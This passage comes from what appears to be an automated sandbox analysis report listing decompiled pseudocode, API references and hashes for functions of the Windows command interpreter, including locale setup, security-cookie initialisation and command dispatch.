					} else {
						 *0x2d3846 = 0xfce09f81;
						 *0x2d384a = 0;
					}
				}
				_t7 = memset(0x2e7f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0x2d3846 != 0) {
					_t15 = 0x2d3846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0x2e7f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}












                                              0x002b46d8
                                              0x002b46e4
                                              0x002b46f1
                                              0x002be8be
                                              0x002be8c7
                                              0x002be8e5
                                              0x002be8fb
                                              0x002be8ed
                                              0x002be8ed
                                              0x002be8ed
                                              0x002be8c9
                                              0x002be8c9
                                              0x002be8d3
                                              0x002be8d3
                                              0x002be8c7
                                              0x002b4703
                                              0x002b4708
                                              0x002b4712
                                              0x002be90b
                                              0x002be910
                                              0x002be910
                                              0x002be915
                                              0x00000000
                                              0x00000000
                                              0x002be917
                                              0x002be91a
                                              0x002be91f
                                              0x002be92e
                                              0x002be933
                                              0x002be933
                                              0x002be936
                                              0x002be93c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be93c
                                              0x002be93f
                                              0x002b4718
                                              0x002b4718
                                              0x002b4718

                                              APIs
                                              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(002B458C), ref: 002B46D8
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002B46E9
                                              • memset.MSVCRT ref: 002B4703
                                              • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 002BE8B8
                                              • memset.MSVCRT ref: 002BE92E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$ConsoleInfoLocaleOutputThread
                                              • String ID: F8-
                                              • API String ID: 1263632223-3642149102
                                              • Opcode ID: 11c66c8cb1ed363e6c0b222e7508a5a5a3be74f14b4f8b4f3609e6a376fec439
                                              • Instruction ID: eb57c4c4f851574734063cf2061cb7d83a82b54474ee19caff1cb5f529ff3e24
                                              • Opcode Fuzzy Hash: 11c66c8cb1ed363e6c0b222e7508a5a5a3be74f14b4f8b4f3609e6a376fec439
                                              • Instruction Fuzzy Hash: 7711AB70C3829299DF34AF10FC4E3E437C5AB00790F080027F8C68A5A1D2A809A9A753
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B7513, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51timethreadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002B7513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x2cd0b4; // 0x40f69e4c
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x2cd0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x2cd0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0x2cd0b8 = _t37;
				return _t37;
			}











                                              0x002b751b
                                              0x002b751f
                                              0x002b7523
                                              0x002b7536
                                              0x002b7540
                                              0x002b754c
                                              0x002b7555
                                              0x002b755e
                                              0x002b756f
                                              0x002b7576
                                              0x002b7582
                                              0x002b7585
                                              0x002b7589
                                              0x002b7593
                                              0x002b7598
                                              0x002b7598
                                              0x002b759a
                                              0x002b759a
                                              0x002b75a0
                                              0x002b75a3
                                              0x002b75ac

                                              APIs
                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 002B7540
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 002B754F
                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 002B7558
                                              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 002B7561
                                              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 002B7576
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID: `jw
                                              • API String ID: 1445889803-3047169340
                                              • Opcode ID: 21a298ba94b77d8a09518c1df0d19a36168b8ced67cb5ec8290b45f88b4c0cdc
                                              • Instruction ID: a786e927bbeb4d1a95f8eaabbe8f97063b72ac1b872a8a1cb0557eae059f4616
                                              • Opcode Fuzzy Hash: 21a298ba94b77d8a09518c1df0d19a36168b8ced67cb5ec8290b45f88b4c0cdc
                                              • Instruction Fuzzy Hash: DA113A71D19109EBCF10DFB8EA8CADEB7F5EF48310F91486AD901EB210E6309A508B40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4C3E, Relevance: 10.5, APIs: 7, Instructions: 42synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E002B4C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0x2cd0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0x2d3858);
					 *0x2cd544 = 1;
					LeaveCriticalSection( *0x2d3858);
					fflush(E002B7721(fprintf(E002B7721(_t8, 2), "^C"), 2));
				}
				 *0x2cd0db = 1;
				CloseHandle(_t18);
				return _v8;
			}







                                              0x002b4c43
                                              0x002b4c44
                                              0x002b4c49
                                              0x002b4c4b
                                              0x002b4c55
                                              0x002b4c60
                                              0x002b4c6d
                                              0x002bee57
                                              0x002bee63
                                              0x002bee6d
                                              0x002bee8f
                                              0x002bee95
                                              0x002b4c74
                                              0x002b4c7b
                                              0x002b4c88

                                              APIs
                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,002C7929,00000000,002C9313,00000000,00000000,?,002B9814,00000000), ref: 002B4C55
                                              • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,002C7929,00000000,002C9313,00000000,00000000,?,002B9814,00000000), ref: 002B4C60
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,002C7929,00000000,002C9313,00000000,00000000,?,002B9814,00000000), ref: 002B4C7B
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,002C7929,00000000,002C9313,00000000,00000000,?,002B9814,00000000), ref: 002BEE57
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,002C7929,00000000,002C9313,00000000,00000000,?,002B9814,00000000), ref: 002BEE6D
                                              • fprintf.MSVCRT ref: 002BEE81
                                              • fflush.MSVCRT ref: 002BEE8F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                              • String ID:
                                              • API String ID: 4271573189-0
                                              • Opcode ID: aba2056f7871805dafcae6097a2d2d967180ed31eeb590384dcacd4aa919f84a
                                              • Instruction ID: 29cf7b772ca3aa240f0f5525e65241b0eec20b4c38ba9cef4bdc5db64f915bae
                                              • Opcode Fuzzy Hash: aba2056f7871805dafcae6097a2d2d967180ed31eeb590384dcacd4aa919f84a
                                              • Instruction Fuzzy Hash: 47018431455294FFDF00ABA8FC4DAD97BACEB06321F100247F518961F1CBB10A509B62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B07C0, Relevance: 9.4, APIs: 6, Instructions: 361COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E002B07C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0x2cbd98);
				_push(E002B7290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E002B0D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E002B0C70( &_v1100, _t78) < 0) {
						L87:
						E002B0DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E002B29BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E002B6A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E002AC5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E002C93E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E002AE040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E002AC7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0x2a1624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E002B0DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E002AEA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E002AE340(_t175) != 0) {
														E002B100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E002A5F50) {
														_t100 = E002A5F50();
													} else {
														if(_t190 == E002A6980) {
															_t100 = E002A6980();
														} else {
															if(_t190 == E002B2360) {
																_t100 = E002B2360();
															} else {
																if(_t190 != E002A9410) {
																	if(_t190 == E002B51B0) {
																		_t100 = E002B51B0();
																	} else {
																		 *0x2e94b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E002A9410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E002B0BDF(_t100);
													L43:
													E002B0DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E002B6FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0x2e3f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0x2e3f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E002B711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E002B0C70(0x2e3ab0, ((0 |  *0x2e3cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0x2e3cb8;
																	if( *0x2e3cb8 == 0) {
																		_t162 = 0x2e3ab0;
																	}
																	_t194 = E002B6826(_t162,  *0x2e3cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E002C292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0x2e3f10)) = 0;
																_t169 = 0x2e3f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E002B29BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E002B6A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E002AC5A2(_t155);
																		 *0x2db8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E002ADD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}































































                                              0x002b07c5
                                              0x002b07c7
                                              0x002b07cc
                                              0x002b07d7
                                              0x002b07d8
                                              0x002b07de
                                              0x002b07e3
                                              0x002b07e6
                                              0x002b07e8
                                              0x002b07eb
                                              0x002b07ee
                                              0x002b07f2
                                              0x002b07f8
                                              0x002b07fa
                                              0x002b0800
                                              0x002b0816
                                              0x002b0820
                                              0x002bcc7e
                                              0x002bcc7e
                                              0x00000000
                                              0x002b0826
                                              0x002b082c
                                              0x002b0838
                                              0x002bcc3d
                                              0x002b083e
                                              0x002b083e
                                              0x002b083e
                                              0x002b0851
                                              0x002bcc73
                                              0x002bcc79
                                              0x00000000
                                              0x002b0857
                                              0x002b0857
                                              0x002b085f
                                              0x002b0b1a
                                              0x002b0b24
                                              0x002bcc47
                                              0x002bcc49
                                              0x00000000
                                              0x002b0b2a
                                              0x002b0b2d
                                              0x002b0b37
                                              0x002bcc4d
                                              0x002bcc55
                                              0x002bcc56
                                              0x002bcc56
                                              0x00000000
                                              0x002b0b3d
                                              0x002b0b51
                                              0x002b0b54
                                              0x002b0b57
                                              0x002b0b57
                                              0x002b0b60
                                              0x002b0b60
                                              0x002b0b63
                                              0x002b0b66
                                              0x002b0b72
                                              0x002bcc8a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b0b72
                                              0x002b0b37
                                              0x00000000
                                              0x002b0865
                                              0x002b0865
                                              0x002b0872
                                              0x002b0874
                                              0x002b087d
                                              0x002b0b78
                                              0x002b0b7f
                                              0x00000000
                                              0x002b0883
                                              0x002b0886
                                              0x00000000
                                              0x002b088c
                                              0x002b088f
                                              0x002b0896
                                              0x002b089e
                                              0x002bcc8f
                                              0x002bcc95
                                              0x002bcc9a
                                              0x00000000
                                              0x002b08a4
                                              0x002b08a4
                                              0x002b08ac
                                              0x002bcca1
                                              0x002bcca1
                                              0x002b08b7
                                              0x002b08ba
                                              0x002b08c2
                                              0x002bccac
                                              0x002bccac
                                              0x002b08ca
                                              0x002b08d6
                                              0x002bccb7
                                              0x002bccb7
                                              0x002b08e6
                                              0x002b08eb
                                              0x002b0a68
                                              0x00000000
                                              0x002b0a6e
                                              0x002b0a76
                                              0x002b0a7c
                                              0x002b0a81
                                              0x00000000
                                              0x002b0a87
                                              0x00000000
                                              0x002b0a87
                                              0x002b0a81
                                              0x002b08f1
                                              0x002b08f1
                                              0x002b08f4
                                              0x002b0909
                                              0x002b090b
                                              0x002b09d1
                                              0x002b09da
                                              0x002b09de
                                              0x002b09de
                                              0x002b09e3
                                              0x002b09ea
                                              0x002b09f0
                                              0x002b09f7
                                              0x002b0a24
                                              0x002b09f9
                                              0x002b09ff
                                              0x002b0aef
                                              0x002b0a05
                                              0x002b0a0b
                                              0x002b0af9
                                              0x002b0a11
                                              0x002b0a17
                                              0x002b0b09
                                              0x002b0b86
                                              0x002b0b0b
                                              0x002b0b0d
                                              0x002b0b13
                                              0x002b0b13
                                              0x002b0a1d
                                              0x002b0a1d
                                              0x002b0a1d
                                              0x002b0a17
                                              0x002b0a0b
                                              0x002b09ff
                                              0x002b0a29
                                              0x002b0a2b
                                              0x002b0a31
                                              0x002b0a38
                                              0x002b0a3d
                                              0x002b0a43
                                              0x002b0a48
                                              0x002b0a4a
                                              0x002b0a4d
                                              0x002b0a55
                                              0x002b0a56
                                              0x002b0a57
                                              0x002b0a65
                                              0x002b0911
                                              0x002b0911
                                              0x002b0920
                                              0x002b0920
                                              0x002b0923
                                              0x002b0926
                                              0x002b092d
                                              0x002b0932
                                              0x002b0938
                                              0x002b093d
                                              0x002b0a98
                                              0x002b0a98
                                              0x002b0a9a
                                              0x002b0a9c
                                              0x002b0a9c
                                              0x002b0aa0
                                              0x002b0aa0
                                              0x002b0aa3
                                              0x002b0aa6
                                              0x002b0aad
                                              0x002b0aaf
                                              0x002b0ab1
                                              0x002b0ab5
                                              0x002b0ab7
                                              0x002b0ab7
                                              0x002b0abe
                                              0x002b0ac0
                                              0x002b0ac8
                                              0x002b0ac8
                                              0x002b0ac9
                                              0x002b0aca
                                              0x002b0ab7
                                              0x002b0ace
                                              0x002b0ad6
                                              0x002b0bf7
                                              0x002b0bfe
                                              0x002b0c09
                                              0x002b0c0e
                                              0x002b0c26
                                              0x002b0c2a
                                              0x002bcd24
                                              0x002bcd25
                                              0x002bcd2a
                                              0x00000000
                                              0x002b0c30
                                              0x002b0c30
                                              0x002b0c38
                                              0x002b0c5d
                                              0x002b0c5d
                                              0x002b0c4b
                                              0x002b0c4f
                                              0x002bcd2e
                                              0x002bcd2f
                                              0x002bcd34
                                              0x002bcd36
                                              0x002bcd3a
                                              0x002bcd3a
                                              0x002b0c4f
                                              0x002b0c5a
                                              0x002b0adc
                                              0x002b0ade
                                              0x002b0ae5
                                              0x00000000
                                              0x002b0ae5
                                              0x002b0943
                                              0x002b0943
                                              0x002b0945
                                              0x002b0945
                                              0x002b0948
                                              0x002bcccc
                                              0x002bccd4
                                              0x002bccd4
                                              0x002b095a
                                              0x002b095a
                                              0x002b0961
                                              0x002b0963
                                              0x002b0965
                                              0x002b096c
                                              0x002b0973
                                              0x002b0975
                                              0x002b0978
                                              0x002b097b
                                              0x002b097e
                                              0x00000000
                                              0x00000000
                                              0x002b097e
                                              0x00000000
                                              0x002b0973
                                              0x002b0982
                                              0x002bccc2
                                              0x002bccc2
                                              0x002b0988
                                              0x002b098a
                                              0x002b098a
                                              0x002b098d
                                              0x002b0996
                                              0x002b0b95
                                              0x00000000
                                              0x002b0b9b
                                              0x002b0b9b
                                              0x002b0ba5
                                              0x002bcc5d
                                              0x002bcc5f
                                              0x00000000
                                              0x002b0bab
                                              0x002b0bb2
                                              0x002b0bc4
                                              0x002b0bc4
                                              0x00000000
                                              0x002b0bb4
                                              0x002b0bb4
                                              0x002b0bbe
                                              0x002bccdc
                                              0x002bcce4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b0bbe
                                              0x002b0bb2
                                              0x002b0ba5
                                              0x002b099c
                                              0x002b099c
                                              0x002b099e
                                              0x002b0bd4
                                              0x00000000
                                              0x002b0bda
                                              0x002bccea
                                              0x002bccec
                                              0x002bcc61
                                              0x002bcc61
                                              0x002bcc66
                                              0x002bcc70
                                              0x00000000
                                              0x002bcc70
                                              0x002b09a4
                                              0x002b09a4
                                              0x002b09a4
                                              0x002b09a6
                                              0x002b09a6
                                              0x002b09b0
                                              0x002b09b0
                                              0x002b09b3
                                              0x002b09b6
                                              0x002b09c2
                                              0x002b09c5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b09c5
                                              0x002b099e
                                              0x002b0996
                                              0x00000000
                                              0x002b093d
                                              0x002b09cb
                                              0x00000000
                                              0x002b09cb
                                              0x002b08f6
                                              0x002b08f8
                                              0x002b0903
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b0903
                                              0x002b08f4
                                              0x002b08eb
                                              0x002b089e
                                              0x002b0886
                                              0x002b087d
                                              0x002b085f
                                              0x002b0851
                                              0x00000000

                                              APIs
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,40F69E4C,00000001,?), ref: 002B0816
                                                • Part of subcall function 002B0D51: memset.MSVCRT ref: 002B0D7D
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • towupper.MSVCRT ref: 002B0B44
                                                • Part of subcall function 002AE040: memset.MSVCRT ref: 002AE090
                                                • Part of subcall function 002AE040: wcschr.MSVCRT ref: 002AE0F3
                                                • Part of subcall function 002AE040: wcschr.MSVCRT ref: 002AE10B
                                                • Part of subcall function 002AE040: _wcsicmp.MSVCRT ref: 002AE179
                                              • wcschr.MSVCRT ref: 002B0932
                                              • wcsncmp.MSVCRT(00000000,002A218C,00000004,00000002,00007FE7), ref: 002B0A76
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                                • Part of subcall function 002A6980: _get_osfhandle.MSVCRT ref: 002A6A06
                                                • Part of subcall function 002A6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002A6A10
                                                • Part of subcall function 002A6980: _wcsnicmp.MSVCRT ref: 002A6A3D
                                                • Part of subcall function 002A6980: _get_osfhandle.MSVCRT ref: 002A6A64
                                                • Part of subcall function 002A6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002A6A6E
                                                • Part of subcall function 002A6980: _get_osfhandle.MSVCRT ref: 002A6A8E
                                                • Part of subcall function 002A6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002A6AA0
                                                • Part of subcall function 002A6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 002A6AC0
                                                • Part of subcall function 002A6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002A6AD1
                                                • Part of subcall function 002A6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002CD620,00000200,00000000,00000000), ref: 002A6AE7
                                                • Part of subcall function 002A6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002A6AF4
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 002BCCDE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                              • String ID:
                                              • API String ID: 1803274588-0
                                              • Opcode ID: b7a833fabaeddc8f1dc60d1d8ffdf4302672cc4d6cf53da64a6aa0b0e99004a7
                                              • Instruction ID: 155f85d92bd7c1d5be7f3e22afa98f0dc3a625dd6deacb4d214abec9c5f00807
                                              • Opcode Fuzzy Hash: b7a833fabaeddc8f1dc60d1d8ffdf4302672cc4d6cf53da64a6aa0b0e99004a7
                                              • Instruction Fuzzy Hash: 73C13931A3021687DB25AF28CCD97FB7364AF417C0F240579E90A9B291EB709DB5CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4800, Relevance: 9.3, APIs: 6, Instructions: 327COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E002B4800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
